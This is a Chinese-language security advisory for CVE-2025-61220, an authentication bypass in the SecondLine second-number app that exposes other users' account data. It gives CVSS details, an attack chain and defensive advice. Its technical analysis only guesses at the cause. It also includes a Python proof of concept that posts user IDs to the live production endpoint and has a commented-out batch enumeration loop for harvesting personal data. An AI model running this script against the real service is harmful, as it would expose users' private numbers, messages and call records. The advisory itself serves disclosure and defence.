CVE-2025-61220：AutoBizLine SecondLine应用认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-61220

漏洞类型

身份认证绕过/不完整验证机制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AutoBizLine com.mysecondline.app (SecondLine)

漏洞概述

CVE-2025-61220是AutoBizLine公司开发的SecondLine应用（com.mysecondline.app）1.2.91版本中存在的一个高危安全漏洞。该漏洞源于应用程序身份验证机制的不完整验证问题，攻击者可以利用此漏洞绕过正常的身份认证流程，以任意其他用户的身份登录系统，从而获取未授权的访问权限。

根据CVSS 3.1评分标准，该漏洞评分为7.5分，属于高危级别。漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），也不需要用户交互（UI:N）。其对机密性影响为高（C:H），对完整性和可用性无影响。这意味着攻击者可以在远程条件下，以极低的攻击成本，获取大量用户的敏感个人信息。

SecondLine是一款提供第二手机号码服务的应用程序，允许用户获取虚拟电话号码用于短信验证、通话等服务。由于该应用涉及用户的个人通信信息，一旦认证机制被绕过，攻击者可以访问其他用户的账户信息、虚拟号码、通话记录、短信内容等高度敏感的个人隐私数据，对用户隐私构成严重威胁。该漏洞的披露者为安全研究员syz913，漏洞已于2025年10月21日公开披露。

技术细节

该漏洞的核心问题在于AutoBizLine SecondLine应用的用户认证接口（https://autobizline.com/secondline/user/get_user/）存在不完整的身份验证机制。具体而言，应用在处理用户身份验证请求时，未能充分验证请求者的身份合法性，导致攻击者可以通过构造特定的请求参数或利用认证流程中的逻辑缺陷，以其他已注册用户的身份完成登录。

从技术层面分析，该漏洞可能涉及以下几种情况：
1. 用户标识符（如用户ID、手机号码或会话令牌）在请求中以明文或可预测的方式传输，服务器端未对其进行二次验证；
2. 认证接口缺乏对请求来源的合法性校验，允许通过简单的参数篡改（如修改用户ID字段）来访问其他用户的账户数据；
3. 会话管理机制存在缺陷，服务器仅依赖客户端传递的用户标识来返回数据，未结合有效的会话令牌或权限验证。

攻击者利用该漏洞时，无需任何认证凭据，仅需向目标接口发送精心构造的HTTP请求，即可获取任意用户的个人信息。由于漏洞的利用复杂度低（AC:L）且无需用户交互（UI:N），攻击者可以编写自动化脚本批量枚举和窃取用户数据，影响范围广泛。该漏洞的CVSS向量中机密性影响为高（C:H），意味着泄露的数据可能包含用户的完整个人资料，对隐私安全构成重大风险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标应用为AutoBizLine SecondLine（com.mysecondline.app）1.2.91版本，确定其API端点位于https://autobizline.com/secondline/user/get_user/

STEP 2

步骤2：接口探测

攻击者向用户认证接口发送探测请求，分析服务器对用户标识符（如user_id）的验证逻辑，发现服务器未对请求者的身份合法性进行充分验证

STEP 3

步骤3：构造恶意请求

攻击者构造包含目标受害者用户标识符的HTTP请求，利用不完整的验证机制绕过身份认证

STEP 4

步骤4：身份冒充登录

服务器错误地信任请求中的用户标识符，将攻击者视为合法用户，返回目标用户的个人信息和账户数据

STEP 5

步骤5：数据窃取

攻击者成功获取受害者的虚拟号码、个人资料、通信记录等敏感信息，可进一步进行批量枚举以窃取大量用户数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61220 PoC - AutoBizLine SecondLine Authentication Bypass
# Vulnerability: Incomplete verification mechanism allowing impersonation
# Affected endpoint: https://autobizline.com/secondline/user/get_user/

import requests

TARGET_URL = "https://autobizline.com/secondline/user/get_user/"

# Attack: Send request with manipulated user identifier to access other users' data
# The authentication mechanism fails to properly verify the requester's identity

def exploit(target_user_id):
    """
    Exploit the incomplete verification mechanism in SecondLine app.
    By manipulating the user identifier parameter, an attacker can
    retrieve arbitrary user information without valid credentials.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; SecondLine/1.2.91)",
        "Content-Type": "application/json",
        "Accept": "application/json"
    }

    # Construct payload with target user's identifier
    # The server fails to verify if the requester is authorized to access this user's data
    payload = {
        "user_id": target_user_id,
        # Additional parameters may be required depending on the API structure
    }

    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)

        if response.status_code == 200:
            print(f"[SUCCESS] Retrieved data for user {target_user_id}")
            print(response.json())
            return response.json()
        else:
            print(f"[FAILED] Status code: {response.status_code}")
            return None
    except Exception as e:
        print(f"[ERROR] {e}")
        return None


# Example usage: enumerate user IDs to harvest personal information
if __name__ == "__main__":
    # Attempt to access victim user's data
    victim_user_id = 1  # Replace with target user ID
    exploit(victim_user_id)

    # Batch enumeration of user accounts
    # for uid in range(1, 1000):
    #     exploit(uid)

影响范围

AutoBizLine com.mysecondline.app 1.2.91

防御指南

临时缓解措施

在官方修复版本发布之前，建议用户暂时避免使用SecondLine应用1.2.91版本处理敏感操作。开发者应在用户认证接口中增加完整的身份验证逻辑，确保服务器端不仅验证用户标识符的有效性，还要验证请求者是否有权访问该用户的数据。同时应立即审查所有API端点，排查是否存在类似的验证不完整问题，并部署入侵检测系统监控异常的账户访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61220
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61220
3 Details https://www.cvedetails.com/cve/CVE-2025-61220/
4 VulDB https://vuldb.com/cve/CVE-2025-61220
5 Link http://autobizline.com
6 Link https://autobizline.com/secondline/user/get_user/
7 Link https://github.com/syz913/CVE-reports/blob/main/CVE-2025-61220.md